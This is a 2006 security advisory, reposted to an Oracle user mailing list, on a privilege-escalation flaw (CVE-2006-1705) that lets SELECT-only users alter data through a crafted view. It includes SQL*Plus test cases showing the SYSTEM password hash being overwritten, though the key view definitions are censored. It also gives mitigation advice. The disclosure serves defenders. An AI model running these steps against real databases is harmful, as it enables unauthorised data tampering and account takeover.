Oracle Exploit Code
Systems Affected : Oracle Database 9.1.0.0 - 10.2.0.3 (any platform)
Severity : High Risk (unpatched)
Category : Privilege Escalation
Vendor URL : http://www.oracle.com/
Author : Alexander Kornbrust (ak at red-database-security.com)
Date : 11 April 2006 (V 1.0.4)
Founder of this vulnerability : Dr. Christian Kleinewächter and Swen Thümmler
from infinity3 GmbH
Oracle Bugno. : 7185031
CVE : CVE-2006-1705
Preface
Last Thursday 6th April 2006, Oracle released a note on the Oracle
knowledgebase Metalink with details about an unfixed security vulnerability
(=0day) and a working test case (=exploit code) which effects all versions of
Oracle from 9.1.0.0 to 10.2.0.3. This note "363848.1 â A User with SELECT
Object Privilege on Base Tables Can Delete Rows from a View" was available last
week to Metalink customers. The note was also displayed in the daily headlines
section of the Metalink and sent to subscribers of the daily headline section.
Thatâs why this information can be assumed as public knowledge and
DBAs/Developers which missed the note on Metalink should know this
vulnerability in order to avoid / mitigate the risk (if possible) whilst
waiting for a patch from Oracle.
After noticing the note, I informed Oracle secalert that releasing such
information on Metalink is not a wise idea. Oracle normally criticises
individuals and/or companies for releasing information about Oracle
vulnerabilities (like David Litchfield from NGSSoftware for releasing
information an ever not fixed bug in mod_plsql gateway). In this case, not only
Oracle released detailed information on the vulnerability; they also included
the working exploit code on the Metalink.
In an interview, the Oracle CSO Mary Ann Davidson stated: âIâve known
customers to terminate contracts ⦠for releasing exploit code⦠you might
get applause from hackers⦠but business will not pay you to slit their
throats. With knowledge comes responsibility.â
After my email, Oracle removed the note from Metalink.
Details
In Oracle versions (9.1.0.0-10.2.0.3) exists an unpatched vulnerability which
allows users with âSELECTâ only privileges on a base table to
insert/update/delete data via a specially crafted view.
The impact can be huge and eliminate the entire role concept because in well
designed applications there is normally a read-only role for low-privilege
users (e.g. reporting or external auditors). If these low-privileged users are
able to create a view, which is standard in Oracle 9.1.x to 10 g R1, they could
also insert, update and delete data via a specially crafted view. Depending on
the architecture of the application, it is possible to modify data, escalate
privileges (e.g. change database passwords, ...), â¦
Patch Information
Currently there are no patches available. According to Oracle secalert Oracle
will provide patches in a future critical patch update.
Red-Database-Security is not convinced that the April 2006 CPU will contain
patches against this vulnerability.
Test case 1 (without the view)
The user dbsnmp has only the privilege "SELECT ANY DICTIONARY". dbsnmp normally
can't update tables in the data dictionary. Exploiting this bug allows the
modification of the SYSTEM password
C:\>sqlplus dbsnmp/dbsnmp
SQL*Plus: Release 10.1.0.4.0 - Production on Thu Apr 11 12:20:27 2006
Copyright (c) 1982, 2005, Oracle. All rights reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.4.0 - Production With the
Partitioning, OLAP and Data Mining options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.4.0 - Prod PL/SQL Release
10.1.0.4.0 - Production
CORE 10.1.0.4.0 Production
TNS for 32-bit Windows: Version 10.1.0.4.0 - Production NLSRTL Version
10.1.0.4.0 - Production
SQL> -- (as expected)
SQL> update sys.user$ set password='BC903FAEBB69EFBF' where name='SYSTEM';
update sys.user$ set password='BC903FAEBB69EFBF' where name='SYSTEM'
*
ERROR at line 1:
ORA-01031: insufficient privileges
SQL> -- create a (specially crafted) custom view
SQL> create or replace view e as select [...censored...];
View created.
SQL> -- Now we change the password of the user SYSTEM to ALEX
SQL> update e set password='BC903FAEBB69EFBF' where name ='SYSTEM';
1 row updated.
Test case 1 (without the view from Jens)
set echo on
connect / as sysdba
create user tableowner
identified by abcd123
default tablespace tools
quota unlimited on tools;
grant create session, create table to tableowner;
create user readuser
identified by abcd123
default tablespace tools;
grant create session, create view to readuser;
connect tableowner/abcd123
create table t1
(id number primary key);
insert into t1 values (1);
grant select on t1 to readuser;
connect readuser/abcd123
create view del_view as
[censored]
select * from del_view;
delete from del_view;
commit;
select * from del_view;
insert into del_view values values (1);
commit;
select * from del_view;
update del_view set id=99;
commit;
select * from del_view;
connect / as sysdba
drop user tableowner cascade;
drop user readuser cascade;
exit
Workarounds / Risk Mitigation
Sanitize the connect role (9i - 10g R1) and remove the CREATE VIEW (and CREATE
DATABASE LINK, â¦) privilege from the connect role.
The Oracle Metalink note recommends creating views the option âWITH CHECK
OPTIONâ. This recommendation helps against accidental modification but not
against hackers.
Credits
Special thanks to Jens Flasche who made Red-Database-Security aware of the
Metalink note and for the first analysis + additional test cases.
Related bugs
2002 there was a similar bug in Oracle 9i Rel.1. It was possible to escalate
privileges via an ANSI outer join. It seems that Oracle introduced this bug
with Oracle 9i Rel. 1
---------------------------------
Talk is cheap. Use Yahoo! Messenger to make PC-to-Phone calls. Great rates
starting at 1¢/min.
[Non-text portions of this message have been removed]
--
-----------I.N.D.O - O.R.A.C.L.E---------------
Keluar: [EMAIL PROTECTED]
Website: http://indo-oracle.lizt.org (NEW)
-----------------------------------------------
Bergabung dengan Indonesia Thin Client User Groups,
Terminal Server, Citrix, New Moon Caneveral, di:
http://indo-thin.vze.com
Yahoo! Groups Links
<*> To visit your group on the web, go to:
http://groups.yahoo.com/group/indo-oracle/
<*> To unsubscribe from this group, send an email to:
[EMAIL PROTECTED]
<*> Your use of Yahoo! Groups is subject to:
http://docs.yahoo.com/info/terms/
